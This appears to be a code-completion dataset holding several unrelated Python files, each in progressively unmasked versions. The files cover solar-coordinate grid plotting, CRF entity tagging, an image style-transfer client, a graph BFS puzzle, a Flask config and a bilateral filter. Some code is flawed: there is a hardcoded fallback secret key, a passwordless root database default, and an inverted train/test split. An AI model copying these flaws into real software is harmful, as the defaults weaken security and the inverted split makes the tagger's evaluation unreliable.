The ``obstime`` to use for the grid coordinate frame.
rsun : `~astropy.units.Quantity`
The ``rsun`` to use for the grid coordinate frame.
observer : `~astropy.coordinates.SkyCoord`
The ``observer`` to use for the grid coordinate frame. Only used for
Carrington coordinates.
system : str
Coordinate system for the grid. Must be 'stonyhurst' or 'carrington'.
If 'carrington', the ``observer`` keyword argument must be specified.
kwargs :
Additional keyword arguments are passed to
:meth:`astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Returns
-------
`~astropy.visualization.wcsaxes.WCSAxes`
The overlay object.
Notes
-----
Keywords are passed to `~astropy.visualization.wcsaxes.coordinates_map.CoordinatesMap.grid`.
"""
# Unpack spacing
if isinstance(grid_spacing, u.Quantity) and grid_spacing.size == 1:
lon_space = lat_space = grid_spacing
elif grid_spacing.size == 2:
lon_space, lat_space = grid_spacing
else:
raise ValueError("grid_spacing must be a Quantity of length one or two.")
if system == 'stonyhurst':
overlay = axes.get_coords_overlay(HeliographicStonyhurst(
obstime=obstime, rsun=rsun))
elif system == 'carrington':
overlay = axes.get_coords_overlay(HeliographicCarrington(
obstime=obstime, observer=observer, rsun=rsun))
else:
raise ValueError(f"system must be 'stonyhurst' or 'carrington' (got '{system}')")
# Set the native coordinates to be bottom and left only so they don't share
# axes with the overlay.
c1, c2 = axes.coords
c1.set_ticks_position('bl')
c2.set_ticks_position('bl')
lon = overlay[0]
lat = overlay[1]
# TODO: Remove when we depend on astropy 5.3
if Version(astropy_version) >= Version("5.3.dev"):
lon.coord_wrap = 180 * u.deg
else:
lon.coord_wrap = 180
lon.set_major_formatter('dd')
if annotate:
lon.set_axislabel(f'{system.capitalize()} Longitude', minpad=0.8)
lat.set_axislabel(f'{system.capitalize()} Latitude', minpad=0.9)
lon.set_ticks_position('tr')
lat.set_ticks_position('tr')
else:
lat.set_ticks_visible(False)
lon.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
lon.set_ticklabel_visible(False)
grid_kw = {'color': 'white', 'zorder': 100, 'alpha': 0.5}
grid_kw.update(kwargs)
# Don't plot white ticks by default (only if explicitly asked)
tick_color = grid_kw['color'] if 'color' in kwargs else 'k'
lon.set_ticks(spacing=lon_space, color=tick_color)
lat.set_ticks(spacing=lat_space, color=tick_color)
overlay.grid(**grid_kw)
if axes.title:
x, y = axes.title.get_position()
axes.title.set_position([x, y + 0.08])
return overlay
| [
4,
5,
6,
7,
8
] |
607 | af9b83b6e213359f5e193918b6c09c22220e5457 | <mask token>
def word2features(sent, i):
word = sent[i][0]
tag = sent[i][1]
features = ['bias', 'word.lower=' + word.lower(), 'word[-3:]=' + word[-
3:], 'word[-2:]=' + word[-2:], 'word.isupper=%s' % word.isupper(),
'word.istitle=%s' % word.istitle(), 'word.isdigit=%s' % word.isdigit()]
if i > 0:
word1 = sent[i - 1][0]
tag1 = sent[i - 1][1]
features.extend(['-1:word.lower=' + word1.lower(),
'-1:word.istitle=%s' % word1.istitle(), '-1:word.isupper=%s' %
word1.isupper(), '-1:tag=' + tag1, '-1:tag[:2]=' + tag1[:2]])
else:
features.append('BOS')
if i < len(sent) - 1:
word1 = sent[i + 1][0]
tag1 = sent[i + 1][1]
features.extend(['+1:word.lower=' + word1.lower(),
'+1:word.istitle=%s' % word1.istitle(), '+1:word.isupper=%s' %
word1.isupper()])
else:
features.append('EOS')
return features
<mask token>
def sent2labels(sent):
return [label for token, label in sent]
<mask token>
def bio_classification_report(y_true, y_pred):
"""
Classification report for a list of BIO-encoded sequences.
It computes token-level metrics and discards "O" labels.
Note that it requires scikit-learn 0.15+ (or a version from github master)
to calculate averages properly!
"""
lb = LabelBinarizer()
y_true_combined = lb.fit_transform(list(chain.from_iterable(y_true)))
y_pred_combined = lb.transform(list(chain.from_iterable(y_pred)))
tagset = set(lb.classes_) - {'O'}
tagset = sorted(tagset, key=lambda tag: tag.split('-', 1)[::-1])
class_indices = {cls: idx for idx, cls in enumerate(lb.classes_)}
return classification_report(y_true_combined, y_pred_combined, labels=[
class_indices[cls] for cls in tagset], target_names=tagset)
def main():
argv = sys.argv
dirname = argv[1]
model = str(argv[2])
files = os.listdir(dirname)
sentences = []
for filename in files:
doc = open(dirname + filename, 'r')
tmp = []
for line in doc:
if line != '\n':
word, tag = line.split('\t')
tmp.append((word, tag[:-1]))
else:
sentences.append(tmp)
tmp = []
sum_of_sencences = len(sentences)
random.shuffle(sentences)
test_size = math.floor(sum_of_sencences * 0.9)
test = sentences[0]
test_sents = sentences[1:test_size]
train_sents = sentences[test_size + 1:]
"""
#クロスバリデーションしてみる
#モデルの問題?
"""
X_train = [sent2features(s) for s in train_sents]
y_train = [sent2labels(s) for s in train_sents]
X_test = [sent2features(s) for s in test_sents]
y_test = [sent2labels(s) for s in test_sents]
trainer = pycrfsuite.Trainer(verbose=False)
for xseq, yseq in zip(X_train, y_train):
trainer.append(xseq, yseq)
trainer.set_params({'c1': 1.0, 'c2': 0.001, 'max_iterations': 100,
'feature.possible_transitions': True})
trainer.train(model)
tagger = pycrfsuite.Tagger()
tagger.open(model)
example_sent = test
for sentence in test_sents:
for token, correct, predict in zip(sent2tokens(sentence),
sent2labels(sentence), tagger.tag(sent2features(sentence))):
print(token + '\t' + correct + '\t' + predict)
print()
"""
print(' '.join(sent2tokens(example_sent)), end='
')
print("Predicted:", ' '.join(tagger.tag(sent2features(example_sent))))
print("Correct: ", ' '.join(sent2labels(example_sent)))
"""
y_pred = [tagger.tag(xseq) for xseq in X_test]
<mask token>
| <mask token>
def word2features(sent, i):
word = sent[i][0]
tag = sent[i][1]
features = ['bias', 'word.lower=' + word.lower(), 'word[-3:]=' + word[-
3:], 'word[-2:]=' + word[-2:], 'word.isupper=%s' % word.isupper(),
'word.istitle=%s' % word.istitle(), 'word.isdigit=%s' % word.isdigit()]
if i > 0:
word1 = sent[i - 1][0]
tag1 = sent[i - 1][1]
features.extend(['-1:word.lower=' + word1.lower(),
'-1:word.istitle=%s' % word1.istitle(), '-1:word.isupper=%s' %
word1.isupper(), '-1:tag=' + tag1, '-1:tag[:2]=' + tag1[:2]])
else:
features.append('BOS')
if i < len(sent) - 1:
word1 = sent[i + 1][0]
tag1 = sent[i + 1][1]
features.extend(['+1:word.lower=' + word1.lower(),
'+1:word.istitle=%s' % word1.istitle(), '+1:word.isupper=%s' %
word1.isupper()])
else:
features.append('EOS')
return features
def sent2features(sent):
return [word2features(sent, i) for i in range(len(sent))]
def sent2labels(sent):
return [label for token, label in sent]
<mask token>
def bio_classification_report(y_true, y_pred):
"""
Classification report for a list of BIO-encoded sequences.
It computes token-level metrics and discards "O" labels.
Note that it requires scikit-learn 0.15+ (or a version from github master)
to calculate averages properly!
"""
lb = LabelBinarizer()
y_true_combined = lb.fit_transform(list(chain.from_iterable(y_true)))
y_pred_combined = lb.transform(list(chain.from_iterable(y_pred)))
tagset = set(lb.classes_) - {'O'}
tagset = sorted(tagset, key=lambda tag: tag.split('-', 1)[::-1])
class_indices = {cls: idx for idx, cls in enumerate(lb.classes_)}
return classification_report(y_true_combined, y_pred_combined, labels=[
class_indices[cls] for cls in tagset], target_names=tagset)
def main():
argv = sys.argv
dirname = argv[1]
model = str(argv[2])
files = os.listdir(dirname)
sentences = []
for filename in files:
doc = open(dirname + filename, 'r')
tmp = []
for line in doc:
if line != '\n':
word, tag = line.split('\t')
tmp.append((word, tag[:-1]))
else:
sentences.append(tmp)
tmp = []
sum_of_sencences = len(sentences)
random.shuffle(sentences)
test_size = math.floor(sum_of_sencences * 0.9)
test = sentences[0]
test_sents = sentences[1:test_size]
train_sents = sentences[test_size + 1:]
"""
#クロスバリデーションしてみる
#モデルの問題?
"""
X_train = [sent2features(s) for s in train_sents]
y_train = [sent2labels(s) for s in train_sents]
X_test = [sent2features(s) for s in test_sents]
y_test = [sent2labels(s) for s in test_sents]
trainer = pycrfsuite.Trainer(verbose=False)
for xseq, yseq in zip(X_train, y_train):
trainer.append(xseq, yseq)
trainer.set_params({'c1': 1.0, 'c2': 0.001, 'max_iterations': 100,
'feature.possible_transitions': True})
trainer.train(model)
tagger = pycrfsuite.Tagger()
tagger.open(model)
example_sent = test
for sentence in test_sents:
for token, correct, predict in zip(sent2tokens(sentence),
sent2labels(sentence), tagger.tag(sent2features(sentence))):
print(token + '\t' + correct + '\t' + predict)
print()
"""
print(' '.join(sent2tokens(example_sent)), end='
')
print("Predicted:", ' '.join(tagger.tag(sent2features(example_sent))))
print("Correct: ", ' '.join(sent2labels(example_sent)))
"""
y_pred = [tagger.tag(xseq) for xseq in X_test]
<mask token>
| <mask token>
def word2features(sent, i):
word = sent[i][0]
tag = sent[i][1]
features = ['bias', 'word.lower=' + word.lower(), 'word[-3:]=' + word[-
3:], 'word[-2:]=' + word[-2:], 'word.isupper=%s' % word.isupper(),
'word.istitle=%s' % word.istitle(), 'word.isdigit=%s' % word.isdigit()]
if i > 0:
word1 = sent[i - 1][0]
tag1 = sent[i - 1][1]
features.extend(['-1:word.lower=' + word1.lower(),
'-1:word.istitle=%s' % word1.istitle(), '-1:word.isupper=%s' %
word1.isupper(), '-1:tag=' + tag1, '-1:tag[:2]=' + tag1[:2]])
else:
features.append('BOS')
if i < len(sent) - 1:
word1 = sent[i + 1][0]
tag1 = sent[i + 1][1]
features.extend(['+1:word.lower=' + word1.lower(),
'+1:word.istitle=%s' % word1.istitle(), '+1:word.isupper=%s' %
word1.isupper()])
else:
features.append('EOS')
return features
def sent2features(sent):
return [word2features(sent, i) for i in range(len(sent))]
def sent2labels(sent):
return [label for token, label in sent]
def sent2tokens(sent):
return [token for token, label in sent]
def bio_classification_report(y_true, y_pred):
"""
Classification report for a list of BIO-encoded sequences.
It computes token-level metrics and discards "O" labels.
Note that it requires scikit-learn 0.15+ (or a version from github master)
to calculate averages properly!
"""
lb = LabelBinarizer()
y_true_combined = lb.fit_transform(list(chain.from_iterable(y_true)))
y_pred_combined = lb.transform(list(chain.from_iterable(y_pred)))
tagset = set(lb.classes_) - {'O'}
tagset = sorted(tagset, key=lambda tag: tag.split('-', 1)[::-1])
class_indices = {cls: idx for idx, cls in enumerate(lb.classes_)}
return classification_report(y_true_combined, y_pred_combined, labels=[
class_indices[cls] for cls in tagset], target_names=tagset)
def main():
argv = sys.argv
dirname = argv[1]
model = str(argv[2])
files = os.listdir(dirname)
sentences = []
for filename in files:
doc = open(dirname + filename, 'r')
tmp = []
for line in doc:
if line != '\n':
word, tag = line.split('\t')
tmp.append((word, tag[:-1]))
else:
sentences.append(tmp)
tmp = []
sum_of_sencences = len(sentences)
random.shuffle(sentences)
test_size = math.floor(sum_of_sencences * 0.9)
test = sentences[0]
test_sents = sentences[1:test_size]
train_sents = sentences[test_size + 1:]
"""
#クロスバリデーションしてみる
#モデルの問題?
"""
X_train = [sent2features(s) for s in train_sents]
y_train = [sent2labels(s) for s in train_sents]
X_test = [sent2features(s) for s in test_sents]
y_test = [sent2labels(s) for s in test_sents]
trainer = pycrfsuite.Trainer(verbose=False)
for xseq, yseq in zip(X_train, y_train):
trainer.append(xseq, yseq)
trainer.set_params({'c1': 1.0, 'c2': 0.001, 'max_iterations': 100,
'feature.possible_transitions': True})
trainer.train(model)
tagger = pycrfsuite.Tagger()
tagger.open(model)
example_sent = test
for sentence in test_sents:
for token, correct, predict in zip(sent2tokens(sentence),
sent2labels(sentence), tagger.tag(sent2features(sentence))):
print(token + '\t' + correct + '\t' + predict)
print()
"""
print(' '.join(sent2tokens(example_sent)), end='
')
print("Predicted:", ' '.join(tagger.tag(sent2features(example_sent))))
print("Correct: ", ' '.join(sent2labels(example_sent)))
"""
y_pred = [tagger.tag(xseq) for xseq in X_test]
if __name__ == '__main__':
main()
| from itertools import chain
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.preprocessing import LabelBinarizer
import sklearn
import pycrfsuite
from sklearn import cross_validation
import sys
import os
import math
import random
def word2features(sent, i):
word = sent[i][0]
tag = sent[i][1]
features = ['bias', 'word.lower=' + word.lower(), 'word[-3:]=' + word[-
3:], 'word[-2:]=' + word[-2:], 'word.isupper=%s' % word.isupper(),
'word.istitle=%s' % word.istitle(), 'word.isdigit=%s' % word.isdigit()]
if i > 0:
word1 = sent[i - 1][0]
tag1 = sent[i - 1][1]
features.extend(['-1:word.lower=' + word1.lower(),
'-1:word.istitle=%s' % word1.istitle(), '-1:word.isupper=%s' %
word1.isupper(), '-1:tag=' + tag1, '-1:tag[:2]=' + tag1[:2]])
else:
features.append('BOS')
if i < len(sent) - 1:
word1 = sent[i + 1][0]
tag1 = sent[i + 1][1]
features.extend(['+1:word.lower=' + word1.lower(),
'+1:word.istitle=%s' % word1.istitle(), '+1:word.isupper=%s' %
word1.isupper()])
else:
features.append('EOS')
return features
def sent2features(sent):
return [word2features(sent, i) for i in range(len(sent))]
def sent2labels(sent):
return [label for token, label in sent]
def sent2tokens(sent):
return [token for token, label in sent]
def bio_classification_report(y_true, y_pred):
"""
Classification report for a list of BIO-encoded sequences.
It computes token-level metrics and discards "O" labels.
Note that it requires scikit-learn 0.15+ (or a version from github master)
to calculate averages properly!
"""
lb = LabelBinarizer()
y_true_combined = lb.fit_transform(list(chain.from_iterable(y_true)))
y_pred_combined = lb.transform(list(chain.from_iterable(y_pred)))
tagset = set(lb.classes_) - {'O'}
tagset = sorted(tagset, key=lambda tag: tag.split('-', 1)[::-1])
class_indices = {cls: idx for idx, cls in enumerate(lb.classes_)}
return classification_report(y_true_combined, y_pred_combined, labels=[
class_indices[cls] for cls in tagset], target_names=tagset)
def main():
argv = sys.argv
dirname = argv[1]
model = str(argv[2])
files = os.listdir(dirname)
sentences = []
for filename in files:
doc = open(dirname + filename, 'r')
tmp = []
for line in doc:
if line != '\n':
word, tag = line.split('\t')
tmp.append((word, tag[:-1]))
else:
sentences.append(tmp)
tmp = []
sum_of_sencences = len(sentences)
random.shuffle(sentences)
test_size = math.floor(sum_of_sencences * 0.9)
test = sentences[0]
test_sents = sentences[1:test_size]
train_sents = sentences[test_size + 1:]
"""
#クロスバリデーションしてみる
#モデルの問題?
"""
X_train = [sent2features(s) for s in train_sents]
y_train = [sent2labels(s) for s in train_sents]
X_test = [sent2features(s) for s in test_sents]
y_test = [sent2labels(s) for s in test_sents]
trainer = pycrfsuite.Trainer(verbose=False)
for xseq, yseq in zip(X_train, y_train):
trainer.append(xseq, yseq)
trainer.set_params({'c1': 1.0, 'c2': 0.001, 'max_iterations': 100,
'feature.possible_transitions': True})
trainer.train(model)
tagger = pycrfsuite.Tagger()
tagger.open(model)
example_sent = test
for sentence in test_sents:
for token, correct, predict in zip(sent2tokens(sentence),
sent2labels(sentence), tagger.tag(sent2features(sentence))):
print(token + '\t' + correct + '\t' + predict)
print()
"""
print(' '.join(sent2tokens(example_sent)), end='
')
print("Predicted:", ' '.join(tagger.tag(sent2features(example_sent))))
print("Correct: ", ' '.join(sent2labels(example_sent)))
"""
y_pred = [tagger.tag(xseq) for xseq in X_test]
if __name__ == '__main__':
main()
| #crfで英文に固有表現認識(タグ付け)をする
#usr/bin/python3
#coding:utf-8
from itertools import chain
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.preprocessing import LabelBinarizer
import sklearn
import pycrfsuite
from sklearn import cross_validation
import sys
import os
import math
import random
def word2features(sent, i):
word = sent[i][0]
tag = sent[i][1]
features = [
'bias',
'word.lower=' + word.lower(),
'word[-3:]=' + word[-3:],
'word[-2:]=' + word[-2:],
'word.isupper=%s' % word.isupper(),
'word.istitle=%s' % word.istitle(),
'word.isdigit=%s' % word.isdigit(),
#'tag=' + tag,
#'tag[:2]=' + tag[:2],
]
if i > 0:
word1 = sent[i-1][0]
tag1 = sent[i-1][1]
features.extend([
'-1:word.lower=' + word1.lower(),
'-1:word.istitle=%s' % word1.istitle(),
'-1:word.isupper=%s' % word1.isupper(),
'-1:tag=' + tag1,
'-1:tag[:2]=' + tag1[:2],
])
else:
features.append('BOS')
if i < len(sent)-1:
word1 = sent[i+1][0]
tag1 = sent[i+1][1]
features.extend([
'+1:word.lower=' + word1.lower(),
'+1:word.istitle=%s' % word1.istitle(),
'+1:word.isupper=%s' % word1.isupper(),
#'+1:tag=' + tag1,
#s'+1:tag[:2]=' + tag1[:2],
])
else:
features.append('EOS')
return features
def sent2features(sent):
return [word2features(sent, i) for i in range(len(sent))]
def sent2labels(sent):
return [label for token, label in sent]
def sent2tokens(sent):
return [token for token, label in sent]
def bio_classification_report(y_true, y_pred):
"""
Classification report for a list of BIO-encoded sequences.
It computes token-level metrics and discards "O" labels.
Note that it requires scikit-learn 0.15+ (or a version from github master)
to calculate averages properly!
"""
lb = LabelBinarizer()
y_true_combined = lb.fit_transform(list(chain.from_iterable(y_true)))
y_pred_combined = lb.transform(list(chain.from_iterable(y_pred)))
tagset = set(lb.classes_) - {'O'}
#tagset = set(lb.classes_)
tagset = sorted(tagset, key=lambda tag: tag.split('-', 1)[::-1])
class_indices = {cls: idx for idx, cls in enumerate(lb.classes_)}
return classification_report(
y_true_combined,
y_pred_combined,
labels = [class_indices[cls] for cls in tagset],
target_names = tagset,
)
def main():
argv = sys.argv
dirname = argv[1]
model = str(argv[2])
#全部読む
files = os.listdir(dirname)
sentences = []
#sentenceごとに読み込み。
for filename in files:
doc = open(dirname+filename,"r")
tmp = []
#文ごとにまとめてから追加する
for line in doc:
if line != "\n":
word, tag = line.split("\t")
tmp.append((word,tag[:-1]))
else:
sentences.append(tmp)
tmp =[]
#for line in sentences:
#print(line)
sum_of_sencences =len(sentences)
#print("sentences: "+str(len(sentences)))
#print(sentences[0])
#sentenceをランダムに入れ替え
random.shuffle(sentences) #->変数代入するのではなく、元のリストがソートされる
#print(sentences[0])
#sentenceをtrain, testに分割
test_size = math.floor(sum_of_sencences*0.9)
test = sentences[0]
test_sents = sentences[1:test_size]
train_sents = sentences[test_size+1:]
"""
#クロスバリデーションしてみる
#モデルの問題?
"""
X_train = [sent2features(s) for s in train_sents]
y_train = [sent2labels(s) for s in train_sents]
X_test = [sent2features(s) for s in test_sents]
y_test = [sent2labels(s) for s in test_sents]
#学習データと同一のトークンータグが含まれているかチェック
trainer = pycrfsuite.Trainer(verbose=False)
for xseq, yseq in zip(X_train, y_train):
trainer.append(xseq, yseq)
trainer.set_params({
'c1': 1.0, # coefficient for L1 penalty
'c2': 1e-3, # coefficient for L2 penalty
'max_iterations': 100, # stop earlier
# include transitions that are possible, but not observed
'feature.possible_transitions': True
})
#print(trainer.params())
trainer.train(model)
#print(len(trainer.logparser.iterations), trainer.logparser.iterations[-1])
tagger = pycrfsuite.Tagger()
tagger.open(model)
example_sent = test
for sentence in test_sents:
for token, correct, predict in zip(sent2tokens(sentence), sent2labels(sentence), tagger.tag(sent2features(sentence))):
print(token+"\t"+correct+"\t"+predict)
print()
"""
print(' '.join(sent2tokens(example_sent)), end='\n\n')
print("Predicted:", ' '.join(tagger.tag(sent2features(example_sent))))
print("Correct: ", ' '.join(sent2labels(example_sent)))
"""
#テストの中に、トレインのものがあるかチェック
y_pred = [tagger.tag(xseq) for xseq in X_test]
#print(bio_classification_report(y_test, y_pred))
if __name__ == '__main__':
main()
| [
4,
5,
7,
8,
9
] |
608 | 932bb7c9dbf3e97c966d2d7d537e747756831e30 | version https://git-lfs.github.com/spec/v1
oid sha256:a2959c4cccf29b3797cc2e2dcef87ddb5a0779d9fb992bb38e190b791ae37eb0
size 88352
| null | null | null | null | [
0
] |
609 | 2536b22c2d154e87bdecb72cc967d8c56ddb73fb | <mask token>
def upload(client, fnames):
for im in fnames:
im = Path(im)
client.file(ORIGINAL_DATA_DIR + str(im.name)).put(im.read_bytes())
<mask token>
def style_transfer(fnames, out_folder, filter_name):
client = Algorithmia.client(API_KEY)
client.dir(ORIGINAL_DATA_DIR).create()
client.dir(TRANSFERD_DATA_DIR).create()
upload(client, fnames)
inputs = {'images': [(ORIGINAL_DATA_DIR + Path(im).name) for im in
fnames], 'savePaths': [(TRANSFERD_DATA_DIR + Path(im).name) for im in
fnames], 'filterName': filter_name}
algorithm_name = 'deeplearning/DeepFilter/0.6.0'
algo = client.algo(algorithm_name)
result = algo.pipe(inputs).result
download(client, out_folder)
return result
| <mask token>
def upload(client, fnames):
for im in fnames:
im = Path(im)
client.file(ORIGINAL_DATA_DIR + str(im.name)).put(im.read_bytes())
def download(client, folder):
folder = Path(folder)
transfered = client.dir(TRANSFERD_DATA_DIR)
for im in transfered.files():
(folder / Path(im.url).name).write_bytes(im.getBytes())
def style_transfer(fnames, out_folder, filter_name):
client = Algorithmia.client(API_KEY)
client.dir(ORIGINAL_DATA_DIR).create()
client.dir(TRANSFERD_DATA_DIR).create()
upload(client, fnames)
inputs = {'images': [(ORIGINAL_DATA_DIR + Path(im).name) for im in
fnames], 'savePaths': [(TRANSFERD_DATA_DIR + Path(im).name) for im in
fnames], 'filterName': filter_name}
algorithm_name = 'deeplearning/DeepFilter/0.6.0'
algo = client.algo(algorithm_name)
result = algo.pipe(inputs).result
download(client, out_folder)
return result
| <mask token>
API_KEY = os.environ.get('ALGO_API_KEY')
DATA_DIR_BASE = os.environ.get('DATA_DIR')
ORIGINAL_DATA_DIR = DATA_DIR_BASE + 'original/'
TRANSFERD_DATA_DIR = DATA_DIR_BASE + 'transferd/'
def upload(client, fnames):
for im in fnames:
im = Path(im)
client.file(ORIGINAL_DATA_DIR + str(im.name)).put(im.read_bytes())
def download(client, folder):
folder = Path(folder)
transfered = client.dir(TRANSFERD_DATA_DIR)
for im in transfered.files():
(folder / Path(im.url).name).write_bytes(im.getBytes())
def style_transfer(fnames, out_folder, filter_name):
client = Algorithmia.client(API_KEY)
client.dir(ORIGINAL_DATA_DIR).create()
client.dir(TRANSFERD_DATA_DIR).create()
upload(client, fnames)
inputs = {'images': [(ORIGINAL_DATA_DIR + Path(im).name) for im in
fnames], 'savePaths': [(TRANSFERD_DATA_DIR + Path(im).name) for im in
fnames], 'filterName': filter_name}
algorithm_name = 'deeplearning/DeepFilter/0.6.0'
algo = client.algo(algorithm_name)
result = algo.pipe(inputs).result
download(client, out_folder)
return result
| import os
from pathlib import Path
import Algorithmia
API_KEY = os.environ.get('ALGO_API_KEY')
DATA_DIR_BASE = os.environ.get('DATA_DIR')
ORIGINAL_DATA_DIR = DATA_DIR_BASE + 'original/'
TRANSFERD_DATA_DIR = DATA_DIR_BASE + 'transferd/'
def upload(client, fnames):
for im in fnames:
im = Path(im)
client.file(ORIGINAL_DATA_DIR + str(im.name)).put(im.read_bytes())
def download(client, folder):
folder = Path(folder)
transfered = client.dir(TRANSFERD_DATA_DIR)
for im in transfered.files():
(folder / Path(im.url).name).write_bytes(im.getBytes())
def style_transfer(fnames, out_folder, filter_name):
client = Algorithmia.client(API_KEY)
client.dir(ORIGINAL_DATA_DIR).create()
client.dir(TRANSFERD_DATA_DIR).create()
upload(client, fnames)
inputs = {'images': [(ORIGINAL_DATA_DIR + Path(im).name) for im in
fnames], 'savePaths': [(TRANSFERD_DATA_DIR + Path(im).name) for im in
fnames], 'filterName': filter_name}
algorithm_name = 'deeplearning/DeepFilter/0.6.0'
algo = client.algo(algorithm_name)
result = algo.pipe(inputs).result
download(client, out_folder)
return result
| import os
from pathlib import Path
import Algorithmia
API_KEY = os.environ.get('ALGO_API_KEY')
DATA_DIR_BASE = os.environ.get('DATA_DIR')
ORIGINAL_DATA_DIR = DATA_DIR_BASE + 'original/'
TRANSFERD_DATA_DIR = DATA_DIR_BASE + 'transferd/'
def upload(client, fnames):
for im in fnames:
im = Path(im)
client.file(ORIGINAL_DATA_DIR + str(im.name)).put(im.read_bytes())
def download(client, folder):
folder = Path(folder)
transfered = client.dir(TRANSFERD_DATA_DIR)
for im in transfered.files():
(folder / Path(im.url).name).write_bytes(im.getBytes())
def style_transfer(fnames, out_folder, filter_name):
client = Algorithmia.client(API_KEY)
client.dir(ORIGINAL_DATA_DIR).create()
client.dir(TRANSFERD_DATA_DIR).create()
upload(client, fnames)
inputs = {
"images": [ORIGINAL_DATA_DIR + Path(im).name for im in fnames],
"savePaths": [TRANSFERD_DATA_DIR + Path(im).name for im in fnames],
"filterName": filter_name
}
algorithm_name = 'deeplearning/DeepFilter/0.6.0'
algo = client.algo(algorithm_name)
result = algo.pipe(inputs).result
download(client, out_folder)
return result
| [
2,
3,
4,
5,
6
] |
610 | 8a631adc8d919fb1dded27177818c4cb30148e94 | <mask token>
def bfs(start):
visited = [False] * (n + 1)
visited[start] = True
q = deque()
q.append(start)
cnt = 1
while q:
now = q.popleft()
for i in graph[now]:
if not visited[i]:
visited[i] = True
q.append(i)
cnt += 1
return cnt
<mask token>
| <mask token>
for _ in range(m):
a, b = map(int, input().split())
graph[b].append(a)
def bfs(start):
visited = [False] * (n + 1)
visited[start] = True
q = deque()
q.append(start)
cnt = 1
while q:
now = q.popleft()
for i in graph[now]:
if not visited[i]:
visited[i] = True
q.append(i)
cnt += 1
return cnt
<mask token>
for i in range(1, n + 1):
result = bfs(i)
if result > max_cnt:
answer = [i]
max_cnt = result
elif result == max_cnt:
answer.append(i)
print(*answer)
| <mask token>
input = sys.stdin.readline
n, m = map(int, input().split())
graph = [[] for _ in range(n + 1)]
for _ in range(m):
a, b = map(int, input().split())
graph[b].append(a)
def bfs(start):
visited = [False] * (n + 1)
visited[start] = True
q = deque()
q.append(start)
cnt = 1
while q:
now = q.popleft()
for i in graph[now]:
if not visited[i]:
visited[i] = True
q.append(i)
cnt += 1
return cnt
answer = []
max_cnt = 0
for i in range(1, n + 1):
result = bfs(i)
if result > max_cnt:
answer = [i]
max_cnt = result
elif result == max_cnt:
answer.append(i)
print(*answer)
| from collections import deque
import sys
input = sys.stdin.readline
n, m = map(int, input().split())
graph = [[] for _ in range(n + 1)]
for _ in range(m):
a, b = map(int, input().split())
graph[b].append(a)
def bfs(start):
visited = [False] * (n + 1)
visited[start] = True
q = deque()
q.append(start)
cnt = 1
while q:
now = q.popleft()
for i in graph[now]:
if not visited[i]:
visited[i] = True
q.append(i)
cnt += 1
return cnt
answer = []
max_cnt = 0
for i in range(1, n + 1):
result = bfs(i)
if result > max_cnt:
answer = [i]
max_cnt = result
elif result == max_cnt:
answer.append(i)
print(*answer)
| # 효율적인 해킹
# https://www.acmicpc.net/problem/1325
from collections import deque
import sys
input = sys.stdin.readline
n, m = map(int, input().split())
graph = [[] for _ in range(n + 1)]
for _ in range(m):
a, b = map(int, input().split())
graph[b].append(a) # B를 해킹하면 A도 해킹할 수 있다
def bfs(start):
visited = [False] * (n + 1)
visited[start] = True
q = deque()
q.append(start)
cnt = 1 # start를 해킹했을 때 해킹할 수 있는 컴퓨터의 개수
while q:
now = q.popleft()
for i in graph[now]:
if not visited[i]:
visited[i] = True
q.append(i)
cnt += 1
return cnt
answer = []
max_cnt = 0
for i in range(1, n + 1):
result = bfs(i)
if result > max_cnt:
answer = [i]
max_cnt = result
elif result == max_cnt:
answer.append(i)
print(*answer) | [
1,
2,
3,
4,
5
] |
611 | 833923c1928862e13c24904f5614927a683b168f | <mask token>
class DevelopmentConfig(Config):
<mask token>
<mask token>
<mask token>
class ProductionConfig(Config):
"""Production Config that extends the Base Config Object"""
DEBUG = False
| <mask token>
class DevelopmentConfig(Config):
"""Development Config that extends the Base Config Object"""
DEVELOPMENT = True
DEBUG = True
class ProductionConfig(Config):
"""Production Config that extends the Base Config Object"""
DEBUG = False
| <mask token>
class Config(object):
"""Base Config Object"""
DEBUG = False
SECRET_KEY = os.environ.get('SECRET_KEY') or 'Som3$ec5etK*y'
UPLOAD_FOLDER = './uploads'
<mask token>
class DevelopmentConfig(Config):
"""Development Config that extends the Base Config Object"""
DEVELOPMENT = True
DEBUG = True
class ProductionConfig(Config):
"""Production Config that extends the Base Config Object"""
DEBUG = False
| import os
class Config(object):
"""Base Config Object"""
DEBUG = False
SECRET_KEY = os.environ.get('SECRET_KEY') or 'Som3$ec5etK*y'
UPLOAD_FOLDER = './uploads'
dbconfig = {'host': os.environ.get('MYSQL_HOST') or 'localhost', 'user': os
.environ.get('MYSQL_USER') or 'root', 'password': os.environ.get(
'MYSQL_PASSWORD') or '', 'db': os.environ.get('MYSQL_DB') or
'finalproject2.sql'}
class DevelopmentConfig(Config):
"""Development Config that extends the Base Config Object"""
DEVELOPMENT = True
DEBUG = True
class ProductionConfig(Config):
"""Production Config that extends the Base Config Object"""
DEBUG = False
| null | [
4,
6,
9,
11
] |
612 | 1748c8dfcc3974b577d7bfacb5cabe4404b696bc | <mask token>
| <mask token>
def bilateral_median_filter(flow, log_occlusen, auxiliary_field, image,
weigth_auxiliary, weigth_filter, sigma_distance=7, sigma_color=7 / 200,
filter_size=5):
"""
:param flow: np.float (YX,Height,Width)
:param occlusen: (Height, Width)
:param auxiliary_field: np.array(float) (Y_flow X_flow , Y_coord X_coord, Height, Width)
:param image: np.array(float) (ColorChannel, Height, Width)
:param weigth_auxiliary: float > 0
:param weigth_filter: float > 0
:param sigma_distance: float
:param sigma_color: float
:param filter_size: int
:return: flow field
"""
width = flow.shape[2]
height = flow.shape[1]
color_channel_count = flow.shape[0]
filter_half = int(filter_size / 2)
helper_list_size = filter_size ** 2 * 2
helper_flow_x_list = [0.0] * (helper_list_size + 1)
helper_flow_y_list = [0.0] * (helper_list_size + 1)
weigths_list = [0.0] * helper_list_size
result_flow = np.empty(shape=(2, height, width), dtype=float)
for y in range(height):
for x in range(width):
min_x_compare = max(0, x - filter_half)
max_x_compare = min(width, x + filter_half + 1)
min_y_compare = max(0, y - filter_half)
max_y_compare = min(height, y + filter_half + 1)
counter = 0
for y_compare in range(min_y_compare, max_y_compare):
for x_compare in range(min_x_compare, max_x_compare):
distance_squared_difference = (y - y_compare) ** 2 + (x -
x_compare) ** 2
color_squared_difference = 0
for channel in image:
color_squared_difference += (channel[y_compare][
x_compare] - channel[y][x]) ** 2
